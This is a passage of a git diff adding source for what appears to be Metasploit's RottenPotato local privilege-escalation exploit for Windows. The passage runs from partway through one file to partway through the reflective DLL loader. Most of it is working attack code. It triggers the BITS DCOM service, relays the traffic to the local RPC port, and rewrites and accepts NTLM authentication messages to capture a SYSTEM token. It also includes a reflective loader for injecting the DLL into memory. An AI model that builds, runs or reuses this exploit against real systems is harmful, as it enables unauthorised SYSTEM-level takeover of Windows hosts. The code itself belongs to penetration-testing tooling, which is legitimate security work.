grfCommitFlags); + HRESULT STDMETHODCALLTYPE CopyTo(DWORD ciidExclude, const IID *rgiidExclude, SNB snbExclude, IStorage *pstgDest); + HRESULT STDMETHODCALLTYPE CreateStorage(const OLECHAR *pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStorage **ppstg); + HRESULT STDMETHODCALLTYPE CreateStream(const OLECHAR *pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStream **ppstm); + HRESULT STDMETHODCALLTYPE DestroyElement(const OLECHAR *pwcsName); + HRESULT STDMETHODCALLTYPE EnumElements(DWORD reserved1, void *reserved2, DWORD reserved3, IEnumSTATSTG **ppenum); + HRESULT STDMETHODCALLTYPE MoveElementTo(const OLECHAR *pwcsName, IStorage *pstgDest, const OLECHAR *pwcsNewName, DWORD grfFlags); + HRESULT STDMETHODCALLTYPE OpenStorage(const OLECHAR *pwcsName, IStorage *pstgPriority, DWORD grfMode, SNB snbExclude, DWORD reserved, IStorage **ppstg); + HRESULT STDMETHODCALLTYPE OpenStream(const OLECHAR *pwcsName, void *reserved1, DWORD grfMode, DWORD reserved2, IStream **ppstm); + HRESULT STDMETHODCALLTYPE RenameElement(const OLECHAR *pwcsOldName, const OLECHAR *pwcsNewName); + HRESULT STDMETHODCALLTYPE Revert(); + HRESULT STDMETHODCALLTYPE SetClass(const IID &clsid); + HRESULT STDMETHODCALLTYPE SetElementTimes(const OLECHAR *pwcsName, const FILETIME *pctime, const FILETIME *patime, const FILETIME *pmtime); + HRESULT STDMETHODCALLTYPE SetStateBits(DWORD grfStateBits, DWORD grfMask); + HRESULT STDMETHODCALLTYPE Stat(STATSTG *pstatstg, DWORD grfStatFlag); + + HRESULT STDMETHODCALLTYPE QueryInterface(const IID &riid, void **ppvObject); + ULONG STDMETHODCALLTYPE AddRef(); + ULONG STDMETHODCALLTYPE Release(); +}; \ No newline at end of file diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.cpp new file mode 100644 index 0000000000..ef78d02e8e --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.cpp @@ -0,0 +1,115 @@ +#include "stdafx.h" +#include "LocalNegotiator.h" +#include + +LocalNegotiator::LocalNegotiator() +{ + authResult = -1; +} + +void InitTokenContextBuffer(PSecBufferDesc pSecBufferDesc, PSecBuffer pSecBuffer) +{ + pSecBuffer->BufferType = SECBUFFER_TOKEN; + pSecBuffer->cbBuffer = 0; + pSecBuffer->pvBuffer = nullptr; + + pSecBufferDesc->ulVersion = SECBUFFER_VERSION; + pSecBufferDesc->cBuffers = 1; + pSecBufferDesc->pBuffers = pSecBuffer; +} + +int LocalNegotiator::handleType1(char * ntlmBytes, int len) +{ + TCHAR lpPackageName[1024] = L"Negotiate"; + TimeStamp ptsExpiry; + + int status = AcquireCredentialsHandle( + NULL, + lpPackageName, + SECPKG_CRED_INBOUND, + NULL, + NULL, + 0, + NULL, + &hCred, + &ptsExpiry); + + if (status != SEC_E_OK) + { + printf("Error in AquireCredentialsHandle"); + return -1; + } + + InitTokenContextBuffer(&secClientBufferDesc, &secClientBuffer); + InitTokenContextBuffer(&secServerBufferDesc, &secServerBuffer); + + phContext = new CtxtHandle(); + + secClientBuffer.cbBuffer = static_cast(len); + secClientBuffer.pvBuffer = ntlmBytes; + + ULONG fContextAttr; + TimeStamp tsContextExpiry; + + status = AcceptSecurityContext( + &hCred, + nullptr, + &secClientBufferDesc, + ASC_REQ_ALLOCATE_MEMORY | ASC_REQ_CONNECTION, + //STANDARD_CONTEXT_ATTRIBUTES, + SECURITY_NATIVE_DREP, + phContext, + &secServerBufferDesc, + &fContextAttr, + &tsContextExpiry); + + return status; +} + +int LocalNegotiator::handleType2(char * ntlmBytes, int len) +{ + char* newNtlmBytes = (char*) secServerBuffer.pvBuffer; + if (len >= secServerBuffer.cbBuffer) { + for (int i = 0; i < len; i++) + { + if (i < secServerBuffer.cbBuffer) { + ntlmBytes[i] = newNtlmBytes[i]; + } + else { + ntlmBytes[i] = 0x00; + } + } + } + else { + printf("Buffer sizes incompatible - can't replace"); + } + + return 0; +} + +int LocalNegotiator::handleType3(char * ntlmBytes, int len) +{ + InitTokenContextBuffer(&secClientBufferDesc, &secClientBuffer); + InitTokenContextBuffer(&secServerBufferDesc, &secServerBuffer); + + secClientBuffer.cbBuffer = static_cast(len); + secClientBuffer.pvBuffer = ntlmBytes; + + ULONG fContextAttr; + TimeStamp tsContextExpiry; + int status = AcceptSecurityContext( + &hCred, + phContext, + &secClientBufferDesc, + ASC_REQ_ALLOCATE_MEMORY | ASC_REQ_CONNECTION, + //STANDARD_CONTEXT_ATTRIBUTES, + SECURITY_NATIVE_DREP, + phContext, + &secServerBufferDesc, + &fContextAttr, + &tsContextExpiry); + + authResult = status; + + return status; +} diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.h b/external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.h new file mode 100644 index 0000000000..b1c8bf5e53 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.h @@ -0,0 +1,21 @@ +#define SECURITY_WIN32 + +#pragma once +#include +#include +class LocalNegotiator +{ +public: + LocalNegotiator(); + int handleType1(char* ntlmBytes, int len); + int handleType2(char* ntlmBytes, int len); + int handleType3(char* ntlmBytes, int len); + PCtxtHandle phContext; + int authResult; + +private: + CredHandle hCred; + SecBufferDesc secClientBufferDesc, secServerBufferDesc; + SecBuffer secClientBuffer, secServerBuffer; +}; + diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.cpp new file mode 100644 index 0000000000..ca2dfaf98a --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.cpp @@ -0,0 +1,374 @@ +#include "stdafx.h" +#include "MSFRottenPotato.h" +#include "IStorageTrigger.h" +#include +#include +#include +#include +#include +#pragma comment (lib, "Ws2_32.lib") +#pragma comment (lib, "Mswsock.lib") +#pragma comment (lib, "AdvApi32.lib") + +int CMSFRottenPotato::newConnection; + +// This is the constructor of a class that has been exported. +// see MSFRottenPotato.h for the class definition +CMSFRottenPotato::CMSFRottenPotato() +{ + comSendQ = new BlockingQueue(); + rpcSendQ = new BlockingQueue(); + newConnection = 0; + negotiator = new LocalNegotiator(); + return; +} + + +DWORD CMSFRottenPotato::startRPCConnectionThread() { + DWORD ThreadID; + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)staticStartRPCConnection, (void*)this, 0, &ThreadID); + return ThreadID; +} + +DWORD CMSFRottenPotato::startCOMListenerThread() { + DWORD ThreadID; + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)staticStartCOMListener, (void*)this, 0, &ThreadID); + return ThreadID; +} + +DWORD WINAPI CMSFRottenPotato::staticStartRPCConnection(void* Param) +{ + CMSFRottenPotato* This = (CMSFRottenPotato*)Param; + return This->startRPCConnection(); +} + +DWORD WINAPI CMSFRottenPotato::staticStartCOMListener(void* Param) +{ + CMSFRottenPotato* This = (CMSFRottenPotato*)Param; + return This->startCOMListener(); +} + +int CMSFRottenPotato::findNTLMBytes(char *bytes, int len) { + //Find the NTLM bytes in a packet and return the index to the start of the NTLMSSP header. + //The NTLM bytes (for our purposes) are always at the end of the packet, so when we find the header, + //we can just return the index + char pattern[7] = { 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50 }; + int pIdx = 0; + int i; + for (i = 0; i < len; i++) { + if (bytes[i] == pattern[pIdx]) { + pIdx = pIdx + 1; + if (pIdx == 7) return (i - 6); + } + else { + pIdx = 0; + } + } + return -1; +} + +int CMSFRottenPotato::processNtlmBytes(char *bytes, int len) { + int ntlmLoc = findNTLMBytes(bytes, len); + if (ntlmLoc == -1) return -1; + + int messageType = bytes[ntlmLoc + 8]; + switch (messageType) { + //NTLM type 1 message + case 1: + negotiator->handleType1(bytes + ntlmLoc, len - ntlmLoc); + break; + //NTLM type 2 message + case 2: + negotiator->handleType2(bytes + ntlmLoc, len - ntlmLoc); + break; + //NTLM type 3 message + case 3: + negotiator->handleType3(bytes + ntlmLoc, len - ntlmLoc); + break; + default: + return -1; + break; + } + return 0; +} + +int checkForNewConnection(SOCKET* ListenSocket, SOCKET* ClientSocket) { + fd_set readSet; + FD_ZERO(&readSet); + FD_SET(*ListenSocket, &readSet); + timeval timeout; + timeout.tv_sec = 1; // Zero timeout (poll) + timeout.tv_usec = 0; + if (select(*ListenSocket, &readSet, NULL, NULL, &timeout) == 1) { + *ClientSocket = accept(*ListenSocket, NULL, NULL); + return 1; + } + return 0; +} + +int CMSFRottenPotato::triggerDCOM(void) +{ + CoInitialize(nullptr); + + //Create IStorage object + IStorage *stg = NULL; + ILockBytes *lb = NULL; + CreateILockBytesOnHGlobal(NULL, true, &lb); + StgCreateDocfileOnILockBytes(lb, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &stg); + + //Initialze IStorageTrigger object + IStorageTrigger* t = new IStorageTrigger(stg); + + //Prep a few more args for CoGetInstanceFromIStorage + CLSID clsid; + //BITS IID + CLSIDFromString(OLESTR("{4991d34b-80a1-4291-83b6-3328366b9097}"), &clsid); + CLSID tmp; + //IUnknown IID + CLSIDFromString(OLESTR("{00000000-0000-0000-C000-000000000046}"), &tmp); + MULTI_QI qis[1]; + qis[0].pIID = &tmp; + qis[0].pItf = NULL; + qis[0].hr = 0; + + //Call CoGetInstanceFromIStorage + HRESULT status = CoGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis); + + return 0; +} + +int CMSFRottenPotato::startRPCConnection(void) { + const int DEFAULT_BUFLEN = 4096; + PCSTR DEFAULT_PORT = "135"; + PCSTR host = "127.0.0.1"; + + WSADATA wsaData; + SOCKET ConnectSocket = INVALID_SOCKET; + struct addrinfo *result = NULL, + *ptr = NULL, + hints; + + char *sendbuf; + char recvbuf[DEFAULT_BUFLEN]; + int iResult; + int recvbuflen = DEFAULT_BUFLEN; + + // Initialize Winsock + iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); + if (iResult != 0) { + return 1; + } + + ZeroMemory(&hints, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + hints.ai_protocol = IPPROTO_TCP; + + // Resolve the server address and port + iResult = getaddrinfo(host, DEFAULT_PORT, &hints, &result); + if (iResult != 0) { + WSACleanup(); + return 1; + } + + // Attempt to connect to an address until one succeeds + for (ptr = result; ptr != NULL; ptr = ptr->ai_next) { + + // Create a SOCKET for connecting to server + ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, + ptr->ai_protocol); + if (ConnectSocket == INVALID_SOCKET) { + WSACleanup(); + return 1; + } + + // Connect to server. + iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); + if (iResult == SOCKET_ERROR) { + closesocket(ConnectSocket); + ConnectSocket = INVALID_SOCKET; + continue; + } + break; + } + + if (ConnectSocket == INVALID_SOCKET) { + WSACleanup(); + return 1; + } + + // Send/Receive until the peer closes the connection + do { + + //Monitor our sendQ until we have some data to send + int *len = (int*)rpcSendQ->wait_pop(); + sendbuf = rpcSendQ->wait_pop(); + + //Check if we should be opening a new socket before we send the data + if (newConnection == 1) { + //closesocket(ConnectSocket); + ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); + connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); + newConnection = 0; + } + + iResult = send(ConnectSocket, sendbuf, *len, 0); + if (iResult == SOCKET_ERROR) { + closesocket(ConnectSocket); + WSACleanup(); + return 1; + } + + iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0); + if (iResult > 0) { + comSendQ->push((char*)&iResult); + comSendQ->push(recvbuf); + } + else if (iResult == 0) + printf("RPC-> Connection closed\n"); + else + printf("RPC -> recv failed with error: %d\n", WSAGetLastError()); + + } while (iResult > 0); + + // cleanup + iResult = shutdown(ConnectSocket, SD_SEND); + closesocket(ConnectSocket); + WSACleanup(); + + return 0; +} + +int CMSFRottenPotato::startCOMListener(void) { + const int DEFAULT_BUFLEN = 4096; + PCSTR DEFAULT_PORT = "6666"; + + WSADATA wsaData; + int iResult; + + SOCKET ListenSocket = INVALID_SOCKET; + SOCKET ClientSocket = INVALID_SOCKET; + + struct addrinfo *result = NULL; + struct addrinfo hints; + + int iSendResult; + char *sendbuf; + + char recvbuf[DEFAULT_BUFLEN]; + int recvbuflen = DEFAULT_BUFLEN; + + // Initialize Winsock + iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); + if (iResult != 0) { + return 1; + } + + ZeroMemory(&hints, sizeof(hints)); + hints.ai_family = AF_INET; + hints.ai_socktype = SOCK_STREAM; + hints.ai_protocol = IPPROTO_TCP; + hints.ai_flags = AI_PASSIVE; + + // Resolve the server address and port + iResult = getaddrinfo(NULL, DEFAULT_PORT, &hints, &result); + if (iResult != 0) { + WSACleanup(); + return 1; + } + + // Create a SOCKET for connecting to server + ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); + if (ListenSocket == INVALID_SOCKET) { + freeaddrinfo(result); + WSACleanup(); + return 1; + } + + // Setup the TCP listening socket + iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen); + if (iResult == SOCKET_ERROR) { + freeaddrinfo(result); + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + freeaddrinfo(result); + + iResult = listen(ListenSocket, SOMAXCONN); + if (iResult == SOCKET_ERROR) { + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + // Accept a client socket + ClientSocket = accept(ListenSocket, NULL, NULL); + if (ClientSocket == INVALID_SOCKET) { + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + // Receive until the peer shuts down the connection + int ntlmLoc; + do { + iResult = recv(ClientSocket, recvbuf, recvbuflen, 0); + if (iResult > 0) { + + //check to see if the received packet has NTLM auth information + processNtlmBytes(recvbuf, iResult); + + //Send all incoming packets to the WinRPC sockets "send queue" and wait for the WinRPC socket to put a packet into our "send queue" + //put packet in winrpc_sendq + rpcSendQ->push((char*)&iResult); + rpcSendQ->push(recvbuf); + + //block and wait for a new item in our sendq + int* len = (int*)comSendQ->wait_pop(); + sendbuf = comSendQ->wait_pop(); + + //Check to see if this is a packet containing NTLM authentication information before sending + processNtlmBytes(sendbuf, *len); + + //send the new packet sendbuf + iSendResult = send(ClientSocket, sendbuf, *len, 0); + + if (iSendResult == SOCKET_ERROR) { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + //Sometimes Windows likes to open a new connection instead of using the current one + //Allow for this by waiting for 1s and replacing the ClientSocket if a new connection is incoming + newConnection = checkForNewConnection(&ListenSocket, &ClientSocket); + } + else if (iResult == 0) + printf("Connection closing...\n"); + else { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + } while (iResult > 0); + + // shutdown the connection since we're done + iResult = shutdown(ClientSocket, SD_SEND); + if (iResult == SOCKET_ERROR) { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + // cleanup + closesocket(ClientSocket); + WSACleanup(); + + closesocket(ListenSocket); + WSACleanup(); + + return 0; +} diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.h b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.h new file mode 100644 index 0000000000..605081a474 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.h @@ -0,0 +1,35 @@ +// The following ifdef block is the standard way of creating macros which make exporting +// from a DLL simpler. All files within this DLL are compiled with the MSFROTTENPOTATO_EXPORTS +// symbol defined on the command line. This symbol should not be defined on any project +// that uses this DLL. This way any other project whose source files include this file see +// MSFROTTENPOTATO_API functions as being imported from a DLL, whereas this DLL sees symbols +// defined with this macro as being exported. +#ifdef MSFROTTENPOTATO_EXPORTS +#define MSFROTTENPOTATO_API __declspec(dllexport) +#else +#define MSFROTTENPOTATO_API __declspec(dllimport) +#endif +#include "Objidl.h" +#include "BlockingQueue.h" +#include "LocalNegotiator.h" + +// This class is exported from the MSFRottenPotato.dll +class MSFROTTENPOTATO_API CMSFRottenPotato { +private: + BlockingQueue* comSendQ; + BlockingQueue* rpcSendQ; + static DWORD WINAPI staticStartRPCConnection(void * Param); + static DWORD WINAPI staticStartCOMListener(void * Param); + static int newConnection; + int processNtlmBytes(char* bytes, int len); + int findNTLMBytes(char * bytes, int len); + +public: + CMSFRottenPotato(void); + int startRPCConnection(void); + DWORD startRPCConnectionThread(); + DWORD startCOMListenerThread(); + int startCOMListener(void); + int triggerDCOM(); + LocalNegotiator *negotiator; +}; diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj new file mode 100755 index 0000000000..3b69b6ed68 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj @@ -0,0 +1,195 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + {4164003E-BA47-4A95-8586-D5AAC399C050} + Win32Proj + MSFRottenPotato + 8.1 + + + + DynamicLibrary + true + v141 + Unicode + + + DynamicLibrary + false + v141 + true + Unicode + + + DynamicLibrary + true + v141 + Unicode + + + DynamicLibrary + false + v141 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + Use + Level3 + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + true + MultiThreaded + + + Windows + true + secur32.lib;%(AdditionalDependencies) + + + + + Use + Level3 + Disabled + _DEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + true + MultiThreaded + + + Windows + true + secur32.lib;%(AdditionalDependencies) + true + + + + + Level3 + NotUsing + MaxSpeed + true + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) + true + MultiThreaded + + + Windows + true + true + true + secur32.lib;%(AdditionalDependencies) + + + + + Level3 + NotUsing + MaxSpeed + true + true + NDEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) + true + MultiThreaded + + + Windows + true + true + true + secur32.lib;%(AdditionalDependencies) + + + + + + + + + + + + + + + + + + false + + + false + + + false + + + false + + + + + + + + + Create + Create + Create + Create + + + + + + \ No newline at end of file diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj.filters b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj.filters new file mode 100644 index 0000000000..0d10aeb8be --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj.filters @@ -0,0 +1,66 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + + + Source Files + + + Source Files + + + Source Files + + + Source Files + + + Source Files + + + Source Files + + + \ No newline at end of file diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveDllInjection.h b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveDllInjection.h new file mode 100644 index 0000000000..d44a8d7079 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveDllInjection.h @@ -0,0 +1,52 @@ +//===============================================================================================// +// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H +#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H +//===============================================================================================// +#define WIN32_LEAN_AND_MEAN +#include + +// we declare some common stuff in here... + +#define DLL_QUERY_HMODULE 6 + +#define DEREF( name )*(UINT_PTR *)(name) +#define DEREF_64( name )*(DWORD64 *)(name) +#define DEREF_32( name )*(DWORD *)(name) +#define DEREF_16( name )*(WORD *)(name) +#define DEREF_8( name )*(BYTE *)(name) + +typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID); +typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); + +#define DLLEXPORT __declspec( dllexport ) + +//===============================================================================================// +#endif +//===============================================================================================// +#pragma once diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.c b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.c new file mode 100644 index 0000000000..8aec0f6d2b --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.c @@ -0,0 +1,572 @@ +//===============================================================================================// +// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#include "ReflectiveLoader.h" +//===============================================================================================// +// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value +HINSTANCE hAppInstance = NULL; +//===============================================================================================// +#pragma intrinsic( _ReturnAddress ) +// This function can not be inlined by the compiler or we will not get the address we expect. Ideally +// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of +// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics +// available (and no inline asm available under x64). +__declspec(noinline) ULONG_PTR caller(VOID) { return (ULONG_PTR)_ReturnAddress(); } +//===============================================================================================// + +#ifdef ENABLE_OUTPUTDEBUGSTRING +#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str) +#else /* ENABLE_OUTPUTDEBUGSTRING */ +#define OUTPUTDBG(str) do{}while(0) +#endif + +// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, +// otherwise the DllMain at the end of this file will be used. + +// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, +// otherwise it is assumed you are calling the ReflectiveLoader via a stub. + +// This is our position independent reflective DLL loader/injector +#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR +DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpParameter) +#else +DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(VOID) +#endif +{ + // the functions we need + LOADLIBRARYA pLoadLibraryA = NULL; + GETPROCADDRESS pGetProcAddress = NULL; + VIRTUALALLOC pVirtualAlloc = NULL; + NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; +#ifdef ENABLE_STOPPAGING + VIRTUALLOCK pVirtualLock = NULL; +#endif +#ifdef ENABLE_OUTPUTDEBUGSTRING + OUTPUTDEBUG pOutputDebug = NULL; +#endif + + USHORT usCounter; + + // the initial location of this image in memory + ULONG_PTR uiLibraryAddress; + // the kernels base address and later this images newly loaded base address + ULONG_PTR uiBaseAddress; + + // variables for processing the kernels export table + ULONG_PTR uiAddressArray; + ULONG_PTR uiNameArray; + ULONG_PTR uiExportDir; + ULONG_PTR uiNameOrdinals; + DWORD dwHashValue; + + // variables for loading this image + ULONG_PTR uiHeaderValue; + ULONG_PTR uiValueA; + ULONG_PTR uiValueB; + ULONG_PTR uiValueC; + ULONG_PTR uiValueD; + ULONG_PTR uiValueE; + + // STEP 0: calculate our images current base address + + // we will start searching backwards from our callers return address. + uiLibraryAddress = caller(); + + // loop through memory backwards searching for our images base address + // we dont need SEH style search as we shouldnt generate any access violations with this + while (TRUE) + { + if (((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE) + { + uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), + // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. + if (uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024) + { + uiHeaderValue += uiLibraryAddress; + // break if we have found a valid MZ/PE header + if (((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE) + break; + } + } + uiLibraryAddress--; + } + + // STEP 1: process the kernels exports for the functions our loader needs... + + // get the Process Enviroment Block +#ifdef _WIN64 + uiBaseAddress = __readgsqword(0x60); +#else +#ifdef WIN_ARM + uiBaseAddress = *(DWORD *)((BYTE *)_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30); +#else _WIN32 + uiBaseAddress = __readfsdword(0x30); +#endif +#endif + + // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx + uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; + + // get the first entry of the InMemoryOrder module list + uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; + while (uiValueA) + { + // get pointer to current modules name (unicode string) + uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; + // set bCounter to the length for the loop + usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; + // clear uiValueC which will store the hash of the module name + uiValueC = 0; + + // compute the hash of the module name... + ULONG_PTR tmpValC = uiValueC; + do + { + tmpValC = ror((DWORD)tmpValC); + // normalize to uppercase if the module name is in lowercase + if (*((BYTE *)uiValueB) >= 'a') + tmpValC += *((BYTE *)uiValueB) - 0x20; + else + tmpValC += *((BYTE *)uiValueB); + uiValueB++; + } while (--usCounter); + uiValueC = tmpValC; + + // compare the hash with that of kernel32.dll + if ((DWORD)uiValueC 